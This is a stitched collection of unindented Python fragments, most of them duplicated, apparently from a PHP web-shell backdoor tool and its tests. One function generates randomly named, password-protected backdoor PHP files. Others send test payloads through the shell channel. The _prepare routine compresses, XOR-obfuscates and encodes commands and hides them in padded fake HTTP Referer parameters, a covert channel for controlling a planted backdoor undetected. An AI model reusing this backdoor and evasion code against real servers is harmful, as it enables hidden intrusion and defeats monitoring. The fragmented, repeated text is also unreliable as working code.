def _randomize_bd(cls):
cls.password = randstr(10)
password_hash = hashlib.md5(cls.password).hexdigest().lower()
filename = '%s_%s.php' % (
__name__, cls.password)
cls.url = os.path.join(config.script_folder_url, filename)
cls.path = os.path.join(config.script_folder, filename)
def _randomize_bd(cls):
cls.password = randstr(10)
password_hash = hashlib.md5(cls.password).hexdigest().lower()
filename = '%s_%s.php' % (
__name__, cls.password)
cls.url = os.path.join(script_folder_url, filename)
cls.path = os.path.join(script_folder, filename)
def populate_files(self, dir_abs_paths, file_name_list = [], file_content_list = []):
"""Populate a folder tree with files with random names.
Args:
dir_abs_path (list of str): List of folders to populate
Returns:
A set of file_abs_path, file_rel_path
"""
files_abs = []
files_rel = []
if file_content_list and len(file_content_list) != len(file_name_list):
raise DevException("Error, file names and contents lists have different lengths.")
for folder_abs in dir_abs_paths:
file_name = file_name_list.pop(0) if file_name_list else utilities.randstr()
files_abs.append(os.path.join(folder_abs, file_name))
files_rel.append(files_abs[-1].replace(config.script_folder, ''))
self.check_call(
config.cmd_env_content_s_to_s % ('1' if not file_content_list else file_content_list.pop(0), files_abs[-1]),
shell=True)
return files_abs, files_rel
def __init__(self,
module,
arguments,
name='',
target=0,
postprocess=None,
background=False):
self.name = name if name else utilities.randstr()
if isinstance(arguments, list):
self.arguments = arguments
else:
raise DevException(messages.vectors.wrong_payload_type)
if not isinstance(target, int) or not target < 3:
raise DevException(messages.vectors.wrong_target_type)
if not callable(postprocess) and postprocess is not None:
raise DevException(messages.vectors.wrong_postprocessing_type)
self.module = module
self.target = target
self.postprocess = postprocess
self.background = background
def populate_files(self, dir_abs_paths, file_name_list = [], file_content_list = []):
"""Populate a folder tree with files with random names.
Args:
dir_abs_path (list of str): List of folders to populate
Returns:
A set of file_abs_path, file_rel_path
"""
files_abs = []
files_rel = []
if file_content_list and len(file_content_list) != len(file_name_list):
raise DevException("Error, file names and contents lists have different lengths.")
for folder_abs in dir_abs_paths:
file_name = file_name_list.pop(0) if file_name_list else utilities.randstr()
files_abs.append(os.path.join(folder_abs, file_name))
files_rel.append(files_abs[-1].replace(config.script_folder, ''))
subprocess.check_call(
config.cmd_env_content_s_to_s % ('1' if not file_content_list else file_content_list.pop(0), files_abs[-1]),
shell=True)
return files_abs, files_rel
def _recursive_folders(self, recursion = 4):
folders = [ config.script_folder ]
for folder in [ utilities.randstr() for f in range(0, recursion) ]:
folders.append(os.path.join(*[ folders[-1], folder ] ))
return folders[1:]
def _incremental_requests(self, size_start, size_to, step_rand_start,
step_rand_to):
for i in range(size_start, size_to,
random.randint(step_rand_start, step_rand_to)):
payload = randstr(i)
self.assertEqual(
self.channel.send('echo("%s");' % payload)[0], payload)
def _recursive_folders(self, recursion = 4):
folders_abs = [ config.script_folder ]
for folder in [ utilities.randstr() for f in range(0, recursion) ]:
folders_abs.append(os.path.join(*[ folders_abs[-1], folder ] ))
folders_rel = [ f.replace(config.script_folder, '') for f in folders_abs[1:] ]
return folders_abs[1:], folders_rel
def _incremental_requests(
self,
size_start,
size_to,
step_rand_start,
step_rand_to):
for i in range(size_start, size_to, random.randint(step_rand_start, step_rand_to)):
payload = randstr(i)
self.assertEqual(
self.channel.send(
'echo("%s");' %
payload)[0],
payload)
def __init__(self, module, arguments, name = '', target = 0, postprocess = None, background = False):
self.name = name if name else utilities.randstr()
if isinstance(arguments, list):
self.arguments = arguments
else:
raise DevException(messages.vectors.wrong_payload_type)
if not isinstance(target, int) or not target < 3:
raise DevException(messages.vectors.wrong_target_type)
if not callable(postprocess) and postprocess is not None:
raise DevException(messages.vectors.wrong_postprocessing_type)
self.module = module
self.target = target
self.postprocess = postprocess
self.background = background
def populate_folders(self, deepness = 4):
"""Generate a folder tree with random names.
Args:
deepness (int): How much is deep the folder tree
Returns:
A set of two strings, dir_abs_path and dir_rel_path
"""
folders_abs = [ config.script_folder ]
for folder in [ utilities.randstr() for f in range(0, deepness) ]:
folders_abs.append(os.path.join(*[ folders_abs[-1], folder ] ))
self.check_call(
config.cmd_env_mkdir_s % (folders_abs[-1]),
shell=True)
folders_rel = [ f.replace(config.script_folder, '') for f in folders_abs[1:] ]
return folders_abs[1:], folders_rel
def populate_folders(self, deepness = 4):
"""Generate a folder tree with random names.
Args:
deepness (int): How much is deep the folder tree
Returns:
A set of two strings, dir_abs_path and dir_rel_path
"""
folders_abs = [ config.script_folder ]
for folder in [ utilities.randstr() for f in range(0, deepness) ]:
folders_abs.append(os.path.join(*[ folders_abs[-1], folder ] ))
subprocess.check_call(
config.cmd_env_mkdir_s % (folders_abs[-1]),
shell=True)
folders_rel = [ f.replace(config.script_folder, '') for f in folders_abs[1:] ]
return folders_abs[1:], folders_rel
def _prepare(self, payload):
obfuscated_payload = base64.urlsafe_b64encode(
utilities.sxor(zlib.compress(payload),
self.shared_key)).rstrip('=')
# Generate a randomic seession_id that does not conflicts with the
# payload chars
for i in range(30):
session_id = ''.join(
random.choice(string.ascii_lowercase) for x in range(2))
# Generate 3-character urlsafe_b64encode header and footer
# checkable on server side
header = hashlib.md5(session_id +
self.shared_key[:4]).hexdigest().lower()[:3]
footer = hashlib.md5(session_id +
self.shared_key[4:8]).hexdigest().lower()[:3]
if (not header in obfuscated_payload
and not footer in obfuscated_payload
and not (obfuscated_payload + footer).find(footer) !=
len(obfuscated_payload)):
break
elif i == 30:
raise ChannelException(
core.messages.stegareferrer.error_generating_id)
remaining_payload = header + obfuscated_payload + footer
dlog.debug('DATA TO SEND: ' + remaining_payload)
dlog.debug('HEADER: %s, FOOTER %s' % (header, footer))
referrers = []
# Randomize the order
random.shuffle(self.referrers_vanilla)
for referrer_index, referrer_vanilla_data in enumerate(
itertools.cycle(self.referrers_vanilla)):
# Separate the chunks sizes from the referrers
referrer_vanilla, chunks_sizes_vanilla = referrer_vanilla_data
# Clone chunk size to avoid .pop(0) consuming
chunks_sizes = chunks_sizes_vanilla[:]
# Separate the query from the rest
referrer, query = referrer_vanilla.split('?', 1)
referrer += '?'
positions = []
# Loop the parameters
parameters = urlparse.parse_qsl(query)
for parameter_index, content in enumerate(parameters):
param, value = content
# Prepend & to parameters
if parameter_index > 0:
referrer += '&'
# Add the templatized parameters
if not value == '${ chunk }':
referrer += '%s=%s' % (param, value)
else:
# Since the parameters over the ninth can't be indexed, this
# Cause an error.
if parameter_index > 9:
raise ChannelException(
core.messages.stegareferrer.
error_chunk_position_i_s %
(parameter_index, referrer_vanilla))
# Pick a proper payload size
min_size, max_size = chunks_sizes.pop(0)
if not remaining_payload:
# If not payload, stuff padding
payload_size = 0
padding_size = random.randint(min_size, max_size)
elif len(remaining_payload) <= min_size:
# Not enough payload, stuff latest payload + padding
payload_size = len(remaining_payload)
padding_size = min_size - payload_size
elif min_size < len(remaining_payload) <= max_size:
# Enough payload to fill properly the parameter, stuff
# payload
payload_size = len(remaining_payload)
padding_size = 0
else:
# Overflowing payload, cut remaining payload to the max
payload_size = max_size
padding_size = 0
# Add crafted parameter
referrer += '%s=%s%s' % (param,
remaining_payload[:payload_size],
utilities.randstr(padding_size))
# If some payload was inserted, add position and cut
# remaining payload
if payload_size:
positions.append(parameter_index)
remaining_payload = remaining_payload[payload_size:]
referrers.append((referrer, positions))
if not remaining_payload:
break
return session_id, referrers
def _prepare(self, payload):
obfuscated_payload = base64.urlsafe_b64encode(
utilities.sxor(
zlib.compress(payload),
self.shared_key)).rstrip('=')
# Generate a randomic seession_id that does not conflicts with the
# payload chars
for i in range(30):
session_id = ''.join(
random.choice(
string.ascii_lowercase) for x in range(2))
# Generate 3-character urlsafe_b64encode header and footer
# checkable on server side
header = hashlib.md5(
session_id +
self.shared_key[
:4]).hexdigest().lower()[
:3]
footer = hashlib.md5(
session_id +
self.shared_key[
4:8]).hexdigest().lower()[
:3]
if (not header in obfuscated_payload and not footer in obfuscated_payload and not (
obfuscated_payload + footer).find(footer) != len(obfuscated_payload)):
break
elif i == 30:
raise ChannelException(
core.messages.stegareferrer.error_generating_id)
remaining_payload = header + obfuscated_payload + footer
dlog.debug('DATA TO SEND: ' + remaining_payload)
dlog.debug('HEADER: %s, FOOTER %s' % (header, footer))
referrers = []
# Randomize the order
random.shuffle(self.referrers_vanilla)
for referrer_index, referrer_vanilla_data in enumerate(itertools.cycle(self.referrers_vanilla)):
# Separate the chunks sizes from the referrers
referrer_vanilla, chunks_sizes_vanilla = referrer_vanilla_data
# Clone chunk size to avoid .pop(0) consuming
chunks_sizes = chunks_sizes_vanilla[:]
# Separate the query from the rest
referrer, query = referrer_vanilla.split('?', 1)
referrer += '?'
positions = []
# Loop the parameters
parameters = urlparse.parse_qsl(query)
for parameter_index, content in enumerate(parameters):
param, value = content
# Prepend & to parameters
if parameter_index > 0:
referrer += '&'
# Add the templatized parameters
if not value == '${ chunk }':
referrer += '%s=%s' % (param, value)
else:
# Since the parameters over the ninth can't be indexed, this
# Cause an error.
if parameter_index > 9:
raise ChannelException(
core.messages.stegareferrer.error_chunk_position_i_s %
(parameter_index, referrer_vanilla))
# Pick a proper payload size
min_size, max_size = chunks_sizes.pop(0)
if not remaining_payload:
# If not payload, stuff padding
payload_size = 0
padding_size = random.randint(min_size, max_size)
elif len(remaining_payload) <= min_size:
# Not enough payload, stuff latest payload + padding
payload_size = len(remaining_payload)
padding_size = min_size - payload_size
elif min_size < len(remaining_payload) <= max_size:
# Enough payload to fill properly the parameter, stuff
# payload
payload_size = len(remaining_payload)
padding_size = 0
else:
# Overflowing payload, cut remaining payload to the max
payload_size = max_size
padding_size = 0
# Add crafted parameter
referrer += '%s=%s%s' % (param,
remaining_payload[
:payload_size],
utilities.randstr(
padding_size
))
# If some payload was inserted, add position and cut
# remaining payload
if payload_size:
positions.append(parameter_index)
remaining_payload = remaining_payload[payload_size:]
referrers.append((referrer, positions))
if not remaining_payload:
break
return session_id, referrers
def rand_chars(self, max_size, min_size=1):
return utilities.randstr(max_size, min_size, string.ascii_letters)
def rand_number(self, max_size, min_size=1):
return utilities.randstr(max_size, min_size, string.digits)